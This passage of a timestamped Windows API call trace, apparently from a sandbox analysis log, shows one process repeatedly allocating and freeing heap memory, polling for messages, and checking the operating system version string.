hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6468 | out: hHeap=0x25c0000) returned 1 [0263.571] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa158 | out: hHeap=0x25c0000) returned 1 [0263.571] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17f8 | out: hHeap=0x25c0000) returned 1 [0263.571] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e40 | out: hHeap=0x25c0000) returned 1 [0263.571] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa128 | out: hHeap=0x25c0000) returned 1 [0263.571] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c90 | out: hHeap=0x25c0000) returned 1 [0263.571] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0263.572] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c90 [0263.572] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17f8 [0263.572] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c90 | out: hHeap=0x25c0000) returned 1 [0263.572] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6468 [0263.572] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c90 [0263.572] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa128 [0263.572] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1778 [0263.572] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c60 [0263.572] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e40 [0263.572] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c98 [0263.572] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e40 | out: hHeap=0x25c0000) returned 1 [0263.572] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d00 [0263.572] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e40 [0263.573] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa158 [0263.573] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6468 | out: hHeap=0x25c0000) returned 1 [0263.573] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17f8 | out: hHeap=0x25c0000) returned 1 [0263.573] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c90 | out: hHeap=0x25c0000) returned 1 [0263.573] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0263.573] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c90 [0263.573] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17f8 [0263.573] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c90 | out: hHeap=0x25c0000) returned 1 [0263.573] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6468 [0263.573] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c90 [0263.573] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95d0 [0263.573] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2da8 [0263.573] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a80 [0263.574] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a96d8 [0263.574] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2bb8 [0263.574] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a96d8 | out: hHeap=0x25c0000) returned 1 [0263.574] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a08 [0263.574] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a96d8 [0263.574] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cc0 [0263.574] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0263.574] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c90 | out: hHeap=0x25c0000) returned 1 [0263.574] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0263.574] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95d0 | out: hHeap=0x25c0000) returned 1 [0263.574] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0263.574] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cc0 | out: hHeap=0x25c0000) returned 1 [0263.574] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6468 | out: hHeap=0x25c0000) returned 1 [0263.574] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17f8 | out: hHeap=0x25c0000) returned 1 [0263.574] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0263.574] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17f8 [0263.575] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cc0 [0263.575] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95d0 [0263.575] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0263.575] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c90 [0263.575] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0263.575] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xca) returned 0x249c7b0 [0263.575] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2da8 [0263.575] CharUpperBuffW (in: lpsz="OSVersion", cchLength=0x9 | out: lpsz="OSVERSION") returned 0x9 [0263.575] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa038 [0263.575] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa950 [0263.575] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa8c0 [0263.575] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9420 [0263.576] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa038 | out: hHeap=0x25c0000) returned 1 [0263.576] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa038 [0263.576] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0263.576] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fc0 [0263.576] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acc60 [0263.576] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2ba8 [0263.576] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0263.576] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249c7b0 | out: hHeap=0x25c0000) returned 1 [0263.576] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0263.576] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9420 | out: hHeap=0x25c0000) returned 1 [0263.576] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8c0 | out: hHeap=0x25c0000) returned 1 [0263.576] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa038 | out: hHeap=0x25c0000) returned 1 [0263.576] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0263.576] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c90 | out: hHeap=0x25c0000) returned 1 [0263.577] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95d0 | out: hHeap=0x25c0000) returned 1 [0263.577] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cc0 | out: hHeap=0x25c0000) returned 1 [0263.577] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0263.577] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e30 [0263.577] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cc0 [0263.577] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WIN_7", cchCount1=5, lpString2="WIN_2000", cchCount2=8) returned 3 [0263.577] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acc60 | out: hHeap=0x25c0000) returned 1 [0263.577] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0263.577] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fc0 | out: hHeap=0x25c0000) returned 1 [0263.578] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cc0 | out: hHeap=0x25c0000) returned 1 [0263.578] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e30 | out: hHeap=0x25c0000) returned 1 [0263.578] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0263.580] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17f8 | out: hHeap=0x25c0000) returned 1 [0263.580] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0263.580] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17f8 [0263.580] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cc0 [0263.580] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fc0 [0263.580] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0263.580] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6468 [0263.580] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2ba8 [0263.580] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0263.581] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6468 | out: hHeap=0x25c0000) returned 1 [0263.581] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0263.581] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24acc60 [0263.581] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0263.581] PeekMessageW (in: lpMsg=0x8bf050, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf050) returned 0 [0263.581] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0263.581] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0263.581] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95d0 [0263.581] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c90 [0263.581] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1438 [0263.581] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa950 [0263.581] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0263.581] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1438 [0263.582] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6468 [0263.582] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0263.582] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6468 | out: hHeap=0x25c0000) returned 1 [0263.582] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0263.582] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0263.582] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c90 | out: hHeap=0x25c0000) returned 1 [0263.582] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95d0 | out: hHeap=0x25c0000) returned 1 [0263.582] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0263.582] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0263.582] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7a0 [0263.582] PeekMessageW (in: lpMsg=0x8bf050, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf050) returned 0 [0263.582] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7a0 | out: hHeap=0x25c0000) returned 1 [0263.582] PeekMessageW (in: lpMsg=0x8bf050, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf050) returned 0 [0263.582] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0263.583] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0263.583] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95d0 [0263.583] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c90 [0263.583] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1438 [0263.583] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa950 [0263.583] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0263.583] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0263.583] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c90 | out: hHeap=0x25c0000) returned 1 [0263.583] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95d0 | out: hHeap=0x25c0000) returned 1 [0263.583] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0263.583] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0263.583] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0263.583] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acc60 | out: hHeap=0x25c0000) returned 1 [0263.583] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0263.583] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acc60 [0263.583] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0263.584] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95d0 [0263.584] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0263.584] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c90 [0263.584] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0263.584] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa950 [0263.584] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0263.584] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa038 [0263.584] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0263.584] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8c0 [0263.584] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0263.584] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6468 [0263.584] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cc0 | out: hHeap=0x25c0000) returned 1 [0263.584] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cc0 [0263.585] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0263.585] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9420 [0263.585] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aaec0 [0263.585] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0263.585] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c48 [0263.585] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0263.585] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c48 | out: hHeap=0x25c0000) returned 1 [0263.585] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aaec0 | out: hHeap=0x25c0000) returned 1 [0263.585] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9420 | out: hHeap=0x25c0000) returned 1 [0263.585] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0263.585] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9420 [0263.585] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0263.585] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aaec0 [0263.586] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0263.586] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c48 [0263.586] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0263.586] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e28 [0263.586] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9a68 [0263.586] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0263.586] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa278 [0263.586] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0263.586] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa278 | out: hHeap=0x25c0000) returned 1 [0263.586] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9a68 | out: hHeap=0x25c0000) returned 1 [0263.586] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e28 | out: hHeap=0x25c0000) returned 1 [0263.586] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0263.586] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e28 [0263.586] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0263.587] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9a68 [0263.587] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0263.587] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0263.587] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6468 | out: hHeap=0x25c0000) returned 1 [0263.587] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa278 [0263.587] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0263.587] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acde0 [0263.587] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b40 [0263.587] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0263.587] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0f8 [0263.587] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0263.587] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0f8 | out: hHeap=0x25c0000) returned 1 [0263.587] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b40 | out: hHeap=0x25c0000) returned 1 [0263.587] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acde0 | out: hHeap=0x25c0000) returned 1 [0263.588] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0263.588] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acde0 [0263.588] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0263.588] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b40 [0263.588] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0263.588] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0f8 [0263.588] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0263.588] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0263.588] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9eb8 [0263.588] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0263.588] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9678 [0263.588] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0263.588] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ab0 [0263.589] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0263.589] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0263.589] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2da8 [0263.589] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b70 [0263.589] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0263.589] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c18 [0263.589] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2ba8 [0263.589] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16b8 [0263.589] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa080 [0263.589] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c18 | out: hHeap=0x25c0000) returned 1 [0263.589] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0263.589] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa080 | out: hHeap=0x25c0000) returned 1 [0263.589] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0263.590] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa080 [0263.590] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16b8 [0263.590] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c18 [0263.590] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2ba8 [0263.590] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1438 [0263.590] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0b0 [0263.590] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c18 | out: hHeap=0x25c0000) returned 1 [0263.590] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0263.590] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0b0 | out: hHeap=0x25c0000) returned 1 [0263.590] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0263.590] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1438 [0263.590] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0b0 [0263.590] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2ba8 [0263.590] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2c18 [0263.590] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c18 [0263.590] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0b0 | out: hHeap=0x25c0000) returned 1 [0263.590] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0263.591] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c18 | out: hHeap=0x25c0000) returned 1 [0263.591] HeapFree (in: 